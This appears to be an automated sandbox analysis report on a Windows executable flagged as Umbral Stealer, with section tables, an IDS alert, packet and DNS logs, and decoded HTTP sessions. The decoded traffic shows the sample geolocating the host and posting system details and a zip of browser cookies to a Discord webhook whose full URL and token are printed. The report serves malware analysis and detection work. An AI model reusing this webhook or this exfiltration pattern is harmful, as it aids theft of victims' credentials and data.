.text	0x2000	0x39134	0x39200	d596e814a42a8c3d2de1c90c6f975bd6	False	0.40252752324945296	data	6.096203268453404	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3c000	0x550	0x600	962661cf515c57234d66775c661dfade	False	0.4134114583333333	data	4.575008625258809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3e000	0xc	0x200	64ba6668b4e58958b06b8873fecc1569	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3c0a0	0x2c4	data			0.4449152542372881
RT_MANIFEST	0x3c364	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T08:21:26.482838+0100	2045593	ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)	1	192.168.2.9	49850	162.159.137.232	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:21:02.322213888 CET	49798	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:21:02.442205906 CET	80	49798	208.95.112.1	192.168.2.9
Dec 13, 2024 08:21:02.442284107 CET	49798	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:21:02.449023962 CET	49798	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:21:02.570070028 CET	80	49798	208.95.112.1	192.168.2.9
Dec 13, 2024 08:21:03.556138992 CET	80	49798	208.95.112.1	192.168.2.9
Dec 13, 2024 08:21:03.566936016 CET	49798	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:21:03.687160015 CET	80	49798	208.95.112.1	192.168.2.9
Dec 13, 2024 08:21:03.687227011 CET	49798	80	192.168.2.9	208.95.112.1
Dec 13, 2024 08:21:24.839734077 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:24.839850903 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:24.839979887 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:24.840466976 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:24.840508938 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.054646969 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.054763079 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.057053089 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.057079077 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.057349920 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.058473110 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.103332996 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.426835060 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.426887989 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.482844114 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.532819986 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.784723997 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.784815073 CET	443	49850	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.784876108 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.789000034 CET	49850	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.790318012 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.790366888 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:26.790456057 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.790709019 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:26.790724993 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.005508900 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.006972075 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.007026911 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.376831055 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.376869917 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.376998901 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377003908 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377137899 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377157927 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377259970 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377278090 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377293110 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377301931 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377312899 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377315998 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377331972 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377340078 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377414942 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377438068 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377471924 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377485991 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377564907 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377573013 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377599955 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377614975 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377698898 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377717972 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377742052 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377757072 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377813101 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377820015 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377916098 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377931118 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.377954960 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.377968073 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.378037930 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.378050089 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.378077984 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.378088951 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.378170013 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.378184080 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381114006 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381131887 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381148100 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381153107 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381174088 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381182909 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381254911 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381268978 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381330013 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381341934 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381355047 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381361008 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381377935 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381386995 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381449938 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381462097 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381469965 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381474972 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381499052 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381509066 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381582975 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381597042 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381620884 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381629944 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381714106 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381724119 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381748915 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381757975 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381828070 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381838083 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381855011 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381860971 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.381953955 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.381975889 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.382019043 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.382097960 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.382160902 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.423335075 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.423696995 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.423938990 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.424030066 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.424043894 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.424058914 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.424118042 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.439429998 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.439786911 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.439991951 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.440043926 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.440093994 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.483330011 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.483448982 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.531327963 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:28.531388044 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:28.575330973 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:29.816409111 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:29.816600084 CET	443	49856	162.159.137.232	192.168.2.9
Dec 13, 2024 08:21:29.816781998 CET	49856	443	192.168.2.9	162.159.137.232
Dec 13, 2024 08:21:29.817334890 CET	49856	443	192.168.2.9	162.159.137.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:21:02.170480967 CET	62179	53	192.168.2.9	1.1.1.1
Dec 13, 2024 08:21:02.311018944 CET	53	62179	1.1.1.1	192.168.2.9
Dec 13, 2024 08:21:24.702116013 CET	54627	53	192.168.2.9	1.1.1.1
Dec 13, 2024 08:21:24.838845015 CET	53	54627	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:21:02.170480967 CET	192.168.2.9	1.1.1.1	0x159d	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:24.702116013 CET	192.168.2.9	1.1.1.1	0x5f73	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:20:21.676677942 CET	1.1.1.1	192.168.2.9	0x1d16	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 08:20:21.676677942 CET	1.1.1.1	192.168.2.9	0x1d16	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:02.311018944 CET	1.1.1.1	192.168.2.9	0x159d	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:24.838845015 CET	1.1.1.1	192.168.2.9	0x5f73	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:24.838845015 CET	1.1.1.1	192.168.2.9	0x5f73	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:24.838845015 CET	1.1.1.1	192.168.2.9	0x5f73	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:24.838845015 CET	1.1.1.1	192.168.2.9	0x5f73	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:21:24.838845015 CET	1.1.1.1	192.168.2.9	0x5f73	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49798	208.95.112.1	80	7912	C:\Users\user\Desktop\WE8zqotCFj.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:21:02.449023962 CET	79	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 13, 2024 08:21:03.556138992 CET	381	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:21:03 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49850	162.159.137.232	443	7912	C:\Users\user\Desktop\WE8zqotCFj.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:21:26 UTC	360	OUT	POST /api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp HTTP/1.1 Accept: application/json User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 Content-Type: application/json; charset=utf-8 Host: discord.com Content-Length: 939 Expect: 100-continue Connection: Keep-Alive
2024-12-13 07:21:26 UTC	939	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 30 36 31 35 34 34 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 33 42 43 37 32 37 34 32 2d 41 33 34 35 2d 41 34 45 34 2d 36 31 42 43 2d 31 39 37 43 32 38 35 43 31 30 31 39 5c 72 5c 6e 43 50 55 3a 20 49 6e Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"__System Info__\r\n```autohotkey\r\nComputer Name: 061544\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 3BC72742-A345-A4E4-61BC-197C285C1019\r\nCPU: In
2024-12-13 07:21:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-13 07:21:26 UTC	1306	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 07:21:26 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734074488 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qd901rok5pq1%2FqlVJSmkbnqQoPljg%2Fy6gpfO8CVyHFI3Cmrt8PhQj91kNnwSK2iUm6y3QlUUoTiwQmjAZS3F%2B%2BBEFWcr%2B1VFcha6NkJ0Wgs72sMzjv%2FqY0wcGBsS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=f2c51aace90cd5ef200eb0cbd75b25f5896e9851-1734074486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=0RdJOmw_l5HeUpV08T_r8JL5MMdeyT5ka_7t3zw0K6w-1734074486630-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8f14328389f86a52-EWR {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49856	162.159.137.232	443	7912	C:\Users\user\Desktop\WE8zqotCFj.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:21:28 UTC	531	OUT	POST /api/webhooks/1296825633070121011/IQgwmKz7t96V-uP0AvQ6pnuefbj4O4Pfn3st5rFkKeLfDwezJAPoFvdKpDB8BZaaMgHp HTTP/1.1 Accept: application/json User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 Content-Type: multipart/form-data; boundary="46b20d0f-10ce-44a0-82dd-616dd5733060" Host: discord.com Cookie: __cfruid=f2c51aace90cd5ef200eb0cbd75b25f5896e9851-1734074486; _cfuvid=0RdJOmw_l5HeUpV08T_r8JL5MMdeyT5ka_7t3zw0K6w-1734074486630-0.0.1.1-604800000 Content-Length: 687697 Expect: 100-continue
2024-12-13 07:21:28 UTC	40	OUT	Data Raw: 2d 2d 34 36 62 32 30 64 30 66 2d 31 30 63 65 2d 34 34 61 30 2d 38 32 64 64 2d 36 31 36 64 64 35 37 33 33 30 36 30 0d 0a Data Ascii: --46b20d0f-10ce-44a0-82dd-616dd5733060
2024-12-13 07:21:28 UTC	140	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 30 36 31 35 34 34 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 30 36 31 35 34 34 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-061544.zip; filename*=utf-8''Umbral-061544.zip
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 08 08 00 a0 12 8d 59 3f 0f b6 3e ec 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 41 72 82 30 14 00 d0 75 9c f1 28 d0 fc 84 10 b2 e8 82 4a a0 2a 52 41 ac ca 86 49 15 81 41 a5 a2 44 c6 d3 d7 13 74 de fe 99 65 db 96 a7 c2 dc b7 67 94 26 6b 89 de 90 ef 86 2b 89 80 52 8b 32 9b 00 c6 1c 38 b3 31 82 65 3e 73 13 44 30 a1 06 60 03 33 03 8b f1 c8 fc 27 60 36 77 80 08 f1 0a 6c 20 28 9a 7a 88 01 bc 37 e2 9e d2 2b df 1d 2b b8 0c b9 bf 3a 61 db 67 6b 99 eb 83 f2 e3 ae a8 83 79 01 ca 8b 1c ba 28 74 e1 f1 65 08 49 b6 d5 ca ba 19 17 7f 2f 1e 2a ae 45 78 9f 2b dd a7 d3 1f e5 2c d6 4d 1b f4 cc 91 2f 50 3e 3e f2 74 33 b3 a2 d2 08 8f 13 fd ac 8a 33 ef a2 ae Data Ascii: PKY?>!#Browsers\Cookies\Chrome Cookies.txt}Ar0u(JRAIADteg&k+R281e>sD0`3'`6wl (z7++:agky(teI/Ex+,M/P>>t33
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: 3f 25 96 80 8c fe ae 9d e1 40 d4 f9 22 63 c2 c9 19 d2 de 6d 15 03 84 69 65 da 1f 8f da be 39 30 22 3a 12 28 3a e7 8c d8 52 fa 8b ee 7b a5 a4 a7 56 3c db cb a7 eb fe 3c 03 9e 61 a7 6c 52 bf 99 aa b2 78 06 06 e3 c9 9d 34 da 30 13 9f ad d5 d9 99 bf 5b 7c 61 1f f8 4e 26 d1 3d 59 25 fc 26 58 3e ca 08 6e 8f c4 b4 ab 4f 4e f7 cb 69 09 ca 80 d7 09 6a 56 bf bf 82 4e 89 c7 a6 38 31 eb 9f 26 38 70 a6 f1 be 7e 33 b0 71 68 06 aa b4 ff 9b 76 07 7a 2d f4 64 5b ca 03 9b 57 8b ad 32 a1 46 09 46 72 56 0e 50 8d 7e 03 e0 11 ba 78 32 ab 98 4d 25 b3 fe b1 ae dd f5 84 ad 47 f0 cc d9 a4 d5 c5 10 e5 19 d7 98 3b 32 5c f7 38 c6 a2 1c eb e8 cf df 43 ce 97 72 cc bf 7c 2d da cc e7 50 90 d8 20 2a ad 97 eb dd 3e 90 4e 8b 29 ee 2e 3f 95 45 12 b0 d1 dd d6 b3 19 20 0d 3c 8d fb 92 65 fe 58 Data Ascii: ?%@"cmie90":(:R{V<<alRx40[\|aN&=Y%&X>nONijVN81&8p~3qhvz-d[W2FFrVP~x2M%G;2\8Cr\|-P *>N).?E <eX
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: e5 48 14 73 36 31 36 69 0e 72 13 b7 36 56 2f 99 35 f7 11 c5 69 7e 8c 51 6b bd 54 14 f4 61 69 cd a6 60 1d 61 1a e5 02 5c 6b cc cb ae 8e eb d0 19 54 26 1b 23 cf 5b 45 37 29 ac 4f 1b 6f 04 19 6b 4d de c1 a3 06 c5 27 51 60 de ed bc ec af f1 84 ac 5a dd 4c cc 96 6c 4a e9 86 b3 bd ff 8a 1d aa 0f e4 1b 1f aa 40 21 20 1c ef bb d2 6b 93 73 97 5a 59 33 db 35 0d 55 bf aa db fc 70 35 5d 28 f1 ed db 29 bd 69 43 4e d9 ed b1 a1 b7 20 39 51 45 6e fd 12 3f 4f c0 17 00 2d f6 06 29 20 c2 18 88 97 8f c8 0b 28 12 78 1e 97 5d 6d b0 25 3b b2 76 3e 6c 8b 25 7a ef 11 d6 f7 e6 62 81 44 2c c2 93 07 64 d0 2e 1c b4 1e 85 b4 04 8c d8 6e ff 6e ce b4 0b db 79 30 c5 1b 08 7e 1d 36 c0 df 82 f8 2a a2 46 bb d0 fc a4 0f dc 29 bf af c1 f8 ea 6e 87 b9 11 d8 f8 98 34 e7 5e ad c6 fc 52 99 32 ea Data Ascii: Hs616ir6V/5i~QkTai`a\kT&#[E7)OokM'Q`ZLlJ@! ksZY35Up5]()iCN 9QEn?O-) (x]m%;v>l%zbD,d.nny0~6*F)n4^R2
2024-12-13 07:21:28 UTC	16355	OUT	Data Raw: 89 57 53 bc a7 b6 69 b8 6c 23 89 37 f8 86 ec 39 c7 05 d6 ad f8 4f 0e ec 5e 26 67 5b 0f 5f f7 c1 11 85 a5 32 26 12 8b 35 89 80 19 28 d6 bb f6 02 7a b0 3c 66 6d ee fe 80 ed 0b 8f 35 82 1d c1 12 96 87 5f bd 5e 54 75 6a 53 c8 92 1e bf 33 39 de cf 14 2b 48 0f 6e b2 cc d8 ad 21 aa 00 ab fe e0 c3 bd 72 aa 8b 70 bf c0 09 d3 65 bd 21 64 9c 2d 74 94 e5 3e 10 6d 6c c1 ae eb 95 e1 dc 82 83 8b ae 00 b5 d6 c9 4f 3b c5 2b 77 0c e7 56 a8 03 0b 04 ef 6f 7e 84 b6 6f 3b 27 86 82 29 95 45 41 86 cc 83 d8 f4 b9 2f 97 bf 39 c6 f5 f8 7d ba 58 34 11 55 7b ca fd f1 01 38 1c 54 bf 72 d9 8e 7c 56 aa 80 ad cf 09 f9 db 70 6d 02 98 74 88 73 6f 62 7c 6d 1f 30 aa 27 b8 bd 5b 77 e3 06 e7 3a 70 7b ee 41 c9 63 1b 97 51 15 fb 43 be cb 9a 2b 78 15 6f fb 4b bb 7f 65 8f de da 58 c6 ae 16 de 78 Data Ascii: WSil#79O^&g[_2&5(z<fm5_^TujS39+Hn!rpe!d-t>mlO;+wVo~o;')EA/9}X4U{8Tr\|Vpmtsob\|m0'[w:p{AcQC+xoKeXx
